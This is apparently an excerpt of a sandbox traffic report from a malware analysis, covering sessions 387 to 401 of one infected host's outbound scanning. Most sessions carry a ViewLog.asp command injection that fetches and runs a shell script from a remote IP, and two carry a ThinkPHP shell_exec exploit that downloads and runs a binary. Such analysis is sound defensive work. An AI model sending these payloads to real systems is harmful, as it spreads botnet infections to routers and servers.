                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        387192.168.2.235047231.136.54.2438080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:58.407192945 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:59.389653921 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:01.309317112 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:05.308738947 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:12.987660885 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:28.345362902 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:59.829082966 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        388192.168.2.234935695.216.112.1048080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:58.409008980 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:58.729099035 CEST88INHTTP/1.0 400 Bad Request
                                                        Data Raw: 43 6c 69 65 6e 74 20 73 65 6e 74 20 61 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 74 6f 20 61 6e 20 48 54 54 50 53 20 73 65 72 76 65 72 2e 0a
                                                        Data Ascii: Client sent an HTTP request to an HTTPS server.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        389192.168.2.234440294.123.100.1408080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:58.435009003 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        390192.168.2.235155294.123.61.438080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:58.435218096 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        391192.168.2.236020894.253.13.688080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:58.435321093 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:58.967255116 CEST453INHTTP/1.1 401 Unauthorized
                                                        Server: Web server
                                                        Date: Sun, 14 Apr 2024 14:35:56 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 177
                                                        Connection: keep-alive
                                                        WWW-Authenticate: Digest realm="ZyXEL Keenetic Viva", nonce="DOgfAKKHsm+r9CgrU9R1tYMj5Fy9JPix", qop="auth"
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>401 Authorization Required</title></head><body><center><h1>401 Authorization Required</h1></center><hr><center>Web server</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        392192.168.2.233644485.133.151.1498080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:58.497206926 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        393192.168.2.234076295.111.230.7380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:59.955560923 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:00.274099112 CEST557INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:00 GMT
                                                        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                                                        Content-Length: 339
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 33 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6e 20 50 48 50 2f 38 2e 31 2e 36 20 53 65 72 76 65 72 20 61 74 20 66 75 6e 63 69 6f 6e 61 72 69 6f 73 2e 6c 79 71 63 72 6d 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 Server at funcionarios.lyqcrm.com Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        394192.168.2.233555895.217.154.17780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:59.963480949 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:00.288875103 CEST498INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:00 GMT
                                                        Server: Apache/2.4.29 (Ubuntu)
                                                        Content-Length: 304
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6b 61 6d 65 6c 65 6f 6e 2e 70 72 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.29 (Ubuntu) Server at kameleon.pro Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        395192.168.2.234553485.85.0.118080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:00.260231018 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        396192.168.2.236070685.100.40.2508080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:00.294040918 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        397192.168.2.234759295.86.105.1718080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:00.298721075 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        398192.168.2.235407431.44.143.798080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:00.301877975 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        399192.168.2.235562495.86.72.1488080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:00.301973104 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        400192.168.2.234569831.30.107.2188080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:00.414239883 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        401192.168.2.235805631.136.249.578080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:00.573795080 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:01.533382893 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:03.453126907 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:07.356599092 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:15.035244942 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:30.393023968 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
